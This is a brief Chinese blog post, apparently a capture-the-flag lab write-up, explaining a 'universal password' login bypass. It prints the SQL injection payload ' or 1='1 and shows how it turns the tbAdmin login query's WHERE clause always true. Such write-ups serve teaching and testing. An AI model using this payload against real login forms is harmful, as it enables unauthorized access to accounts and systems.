美文网首页
ibug靶场(万能密码登陆)

ibug靶场(万能密码登陆)

作者: 1f28dd1475ee | 来源:发表于2019-02-17 19:22 被阅读0次

    题目很明显的标注,万能密码登陆

    用户名随便输

    密码: ' or 1 ='1

    登陆拿到flag

    select name,pass from tbAdmin where name='admin' and pass='123456'

    输入密码: ' or 1='1

    sql语句就变成下面这个样子:

    select name,pass from tbAdmin where name='admin' and pass='' or 1='1'

    1='1'永远为真,所以登陆成功

    相关文章

      网友评论

          本文标题:ibug靶场(万能密码登陆)

          本文链接:https://www.haomeiwen.com/subject/wycneqtx.html